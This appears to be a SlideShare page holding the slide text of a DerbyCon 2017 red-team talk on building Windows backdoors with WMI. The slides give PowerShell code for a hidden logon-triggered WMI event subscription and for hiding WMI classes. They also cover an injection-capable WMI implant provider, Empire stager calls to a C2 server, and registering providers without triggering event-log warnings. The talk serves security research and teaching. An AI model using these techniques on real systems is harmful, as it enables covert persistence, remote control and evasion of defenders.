O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.

Building Better Backdoors with WMI - DerbyCon 2017

3.117 visualizações

Publicada em

Slides for Building Better Backdoors with WMI - DerbyCon 2017 - Legacy

Code:
https://github.com/0xbadjuju/PowerProvider/
https://github.com/0xbadjuju/WheresMyImplant

Publicada em: Tecnologia
  • Seja o primeiro a comentar

Building Better Backdoors with WMI - DerbyCon 2017

  1. 1. BUILDING BETTER BACKDOORS WITH WMI
  2. 2. 2 Confidential & Proprietary WHO AM I  Alexander Polce Leary  Senior Network & Application Pentester at NetSPI  Twitter: 0xbadjuju  KeyBase: 0xbadjuju  Blogs: https://blog.netspi.com/author/aleary/  Code: https://github.com/0xbadjuju/
  3. 3. 3 Confidential & Proprietary OUTLINE 1. WMI Overview 2. Fileless Backdoors 3. WMI for Storage 4. WMI Providers 5. Installing WMI Providers https://github.com/0xbadjuju/PowerProvider https://github.com/0xbadjuju/WheresMyImplant
  4. 4. 4 Confidential & Proprietary WHAT IS WMI?  Windows Management Instrumentation  Present since Windows 95  It shows  Probably familiar with some WMI functions  Win32_Process -> Create()  wmic.exe process call create …  Invoke-WmiMethod –class win32_process –name create –argumentlist …
  5. 5. 5 Confidential & Proprietary WMI OVERVIEW  WMI  Namespace  Class  Property  Static || Dynamic  Method  WQL  SELECT * from class;  SQL Server  Database  Table  Row  Static  Stored Procedure  SQL  SELECT * FROM table;
  6. 6. 6 Confidential & Proprietary6 Confidential & Proprietary FILELESS BACKDOORS INVOKE-WMIDUPLICATECLASS
  7. 7. 7 Confidential & Proprietary WMI CLASS INHERITANCE  WMI has a robust implementation of class inheritance  CIM_ManagedSystemElement  CIM_LogicalElement  CIM_Process  Win32_Process  ???
  8. 8. 8 Confidential & Proprietary DUPLICATING A WMI CLASS $NewManagementClass = $ManagementClass.Derive($DerivedClassName) $NewManagementClass.put() $NewManagementClass = $ManagementClass.Clone($ClonedClassName) $NewManagementClass.put() https://twitter.com/mattifestation/status/907702749193633792
  9. 9. 9 Confidential & Proprietary HIDING WMI METHODS Invoke-WMIDuplicateClass -TargetClassName Win32_Process -DuplicateClassName Win32_Create -ComputerName $ComputerName -Credential $Credential
  10. 10. 10 Confidential & Proprietary
  11. 11. 11 Confidential & Proprietary Binding WMI FILELESS BACKDOORS  EventFilter  __EventFilter  Consumers  ComandLineEventConsumer  ActiveScriptEventConsumer  Binding  __FilterToConsumberBinding  Well Known and Documented Technique  https://github.com/Sw4mpf0x/PowerLurk  https://blog.netspi.com/ Event Filter (Trigger) Consumer (Action)
  12. 12. 12 Confidential & Proprietary EVENT FILTER + CONSUMER EXAMPLE $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{ EventNamespace = 'root/cimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
  13. 13. 13 Confidential & Proprietary INVOKE-WMIDUPLICATECLASS Invoke-WMIDuplicateClass -TargetClassName CommandLineEventConsumer -DuplicateClassName DerivedEventConsumer -NameSpace ROOTSubscription ComputerName $ComputerName -Credential $Credential –Verbose $Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{ EventNamespace = 'rootcimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace rootsubscription -Class DerivedEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
  14. 14. 14 Confidential & Proprietary
  15. 15. 15 Confidential & Proprietary15 Confidential & Proprietary WMI FOR STORAGE INVOKE-WMIFS
  16. 16. 16 Confidential & Proprietary INVOKE-WMIFS 1. Create a WMI class to store file in  New-WMIFSClass 2. Read in file and base64 encode and encrypt  ConvertTo-Base64 & ConvertTo-EncryptedText 3. Slice the base64 encoded string and insert into WMI  Invoke-InsertFileThreaded 4. Retrieve the file and reassemble  Invoke-RetrieveFile 5. Base64, decrypt file, and optionally write to disk  ConvertFrom-Base64 & ConvertFrom-EncryptedText Wrapped into Invoke-WMIUpload & Invoke-WMIRemoteExtract
  17. 17. 17 Confidential & Proprietary
  18. 18. 18 Confidential & Proprietary18 Confidential & Proprietary WMI PROVIDERS WHERESMYIMPLANT
  19. 19. 19 Confidential & Proprietary WMI PROVIDERS  These are the DLL’s behind the scenes that do all the work  Host the methods and properties that we call  cimwin32.dll  What about building our own provider?  Build the provider  Register the provider  Access the provider
  20. 20. 20 Confidential & Proprietary HOW TO CREATE A PROVIDER  WmiPrvSe.exe can host the Common Language Runtime (CLR)  Opens up .Net for use in WMI  Add a few decorators to a class and your done  [ManagementEntity]  [ManagementTask] https://gist.github.com/0xbadjuju/550fb602a8b7aa610436d533c94a1885
  21. 21. 21 Confidential & Proprietary BASIC BACKDOOR  Command Execution  ShellCode Runner  Dll Injector  PE Injector https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider https://github.com/subTee/EvilWMIProvider
  22. 22. 22 Confidential & Proprietary
  23. 23. 23 Confidential & Proprietary BASIC WMI BACKDOOR
  24. 24. 24 Confidential & Proprietary
  25. 25. 25 Confidential & Proprietary BETTER WMI BACKDOOR  Store Payload as Base64 Encoded String in WMI, and then inject the payload  ShellCode Runner  Dll Injector  PE Injector
  26. 26. 26 Confidential & Proprietary BETTER WMI BACKDOOR
  27. 27. 27 Confidential & Proprietary
  28. 28. 28 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Stager? Why not? $language = “powershell” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
  29. 29. 29 Confidential & Proprietary EMPIRE – POWERSHELL AGENT
  30. 30. 30 Confidential & Proprietary
  31. 31. 31 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Agent? Why not? $language = “dotnet” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
  32. 32. 32 Confidential & Proprietary EMPIRE - .NET AGENT
  33. 33. 33 Confidential & Proprietary33 Confidential & Proprietary REGISTERING WMI PROVIDERS INSTALL-WMIPROVIDER
  34. 34. 34 Confidential & Proprietary INSTALLUTIL.EXE PS C:> InstallUtil.exe assembly.dll PS C:> InstallUtil.exe /u assembly.dll In the Windows Event Log this triggers a warning.
  35. 35. 35 Confidential & Proprietary
  36. 36. 36 Confidential & Proprietary
  37. 37. 37 Confidential & Proprietary .NET MANAGEDINSTALLERCLASS PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @( "C:assembly.dll") ) PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @(“/u”, "C:assembly.dll") ) The PS version and .net assembly version need to match. In the Windows Event Log this also triggers a warning.
  38. 38. 38 Confidential & Proprietary
  39. 39. 39 Confidential & Proprietary
  40. 40. 40 Confidential & Proprietary MANUAL REGISTRATION  What if we were to register the WMI Provider purely through WMI calls  This does not come close to fitting on a slide 1. Create the WMI_extension Class 2. Create an instance of WMI_extension for the Win32_Implant Class 3. Create an instance of __InstanceProviderRegistration for WMI_extension 4. Create an instance of __MethodProviderRegistration for WMI_extension 5. Create the Win32_Implant Class 6. Register WMI_extension in HKCR and HKLM
  41. 41. 41 Confidential & Proprietary MANUAL REGISTRATION That looks hard
  42. 42. 42 Confidential & Proprietary MANUAL REGISTRATION It was
  43. 43. 43 Confidential & Proprietary MANUAL REGISTRATION Why would I want to do that?  Manually registering a WMI provider allows us to bypass calling any executables on the remote system  Remember those pesky Windows Event Logs warnings?  Those are caused by the default hosting model LocalSystemHost  There are many, many others to choose from.  Win32_Process -> Create() uses NetworkServiceHost  Wanna guess that that HostingModel doesn’t do?
  44. 44. 44 Confidential & Proprietary MANUAL REGISTRATION Install-WMIProviderExtension -ComputerName $ComputerName -Credential $Credential -RemoteLibraryLocation C:WindowsSystem32wbemWheresMyImplant.dll -ProviderDisplayName Win32_Implant -HostingModel NetworkServiceHost:CLR
  45. 45. 45 Confidential & Proprietary
  46. 46. 46 Confidential & Proprietary
  47. 47. 47 Confidential & Proprietary Questions?

×